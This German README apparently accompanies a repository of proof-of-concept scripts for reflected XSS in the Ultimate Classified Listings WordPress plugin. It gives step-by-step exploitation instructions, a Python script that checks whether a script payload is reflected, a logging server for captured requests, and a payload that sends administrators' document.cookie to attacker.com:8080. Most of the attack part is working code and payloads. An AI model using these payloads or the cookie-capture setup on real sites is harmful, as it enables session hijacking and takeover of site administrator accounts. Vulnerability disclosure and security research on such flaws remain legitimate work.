
Proof-of-Concept-Skripte, die reflektiertes XSS im Ultimate Classified Listings WordPress-Plugin und Admin-Cookie-Diebstahl über manipulierte Payloads und einen Logging-Server demonstrieren.
Dieses Repository enthält Proof-of-Concept-Skripte (PoC) für verschiedene Schwachstellen, die in unterschiedlichen WordPress-Plugins entdeckt wurden. Diese Skripte zeigen, wie Angreifer diese Schwachstellen ausnutzen können, um schädliche Aktionen durchzuführen.
Reflektiertes Cross-Site Scripting (XSS) im Ultimate Classified Listings Plugin
Cookie-Diebstahl mittels XSS
Dieses PoC zeigt, wie die reflektierte XSS-Schwachstelle im Ultimate Classified Listings Plugin ausgenutzt werden kann.
Identifiziere den anfälligen Parameter:
search in der URL http://example.com/classifieds.Erstelle eine bösartige URL:
http://example.com/classifieds?search=<script>alert('XSS')</script>
Führe das PoC-Skript aus:
xss_poc.py und führe es aus.import requests
# Configuration
target_url = "http://example.com/classifieds" # Change this to the target site's URL
payload = "<script>alert('XSS')</script>" # XSS payload
def trigger_xss():
# Construct the malicious URL
malicious_url = f"{target_url}?search={payload}"
# Send a GET request to the malicious URL
response = requests.get(malicious_url)
# Check if the payload is reflected in the response
if payload in response.text:
print("[+] XSS payload reflected in the response.")
print("[+] Malicious URL:", malicious_url)
else:
print("[-] XSS payload not reflected in the response.")
if __name__ == "__main__":
trigger_xss()
Dieses PoC zeigt, wie ein Angreifer die reflektierte XSS-Schwachstelle ausnutzen kann, um Cookies von Benutzern mit hohen Privilegien zu stehlen.
Richte einen bösartigen Server ein:
malicious_server.py und führe es aus, um einen Server zu starten, der eingehende Anfragen (einschließlich Cookies) protokolliert.from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.info(f"Received request: {self.headers}")
self.send_response(200)
self.end_headers()
def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
logging.basicConfig(filename='server.log', level=logging.INFO)
server_address = ('', port)
httpd = server_class(server_address, handler_class)
logging.info(f'Starting server on port {port}...')
httpd.serve_forever()
if __name__ == "__main__":
run()
Erstelle einen Payload zum Stehlen von Cookies:
http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
Führe das PoC-Skript aus:
steal_cookies_poc.py und führe es aus.import requests
# Configuration
target_url = "http://example.com/classifieds" # Change this to the target site's URL
attacker_server = "http://attacker.com:8080" # Change this to your malicious server's URL
payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
def trigger_xss():
# Construct the malicious URL
malicious_url = f"{target_url}?search={payload}"
# Send a GET request to the malicious URL
response = requests.get(malicious_url)
# Check if the payload is reflected in the response
if payload in response.text:
print("[+] XSS payload reflected in the response.")
print("[+] Malicious URL:", malicious_url)
else:
print("[-] XSS payload not reflected in the response.")
if __name__ == "__main__":
trigger_xss()
Diese PoCs zeigen, wie ein Angreifer Schwachstellen in WordPress-Plugins ausnutzen kann, um schädliche Aktionen durchzuführen. Halte deine Software stets auf dem neuesten Stand und befolge die besten Sicherheitspraktiken, um solche Schwachstellen zu vermeiden.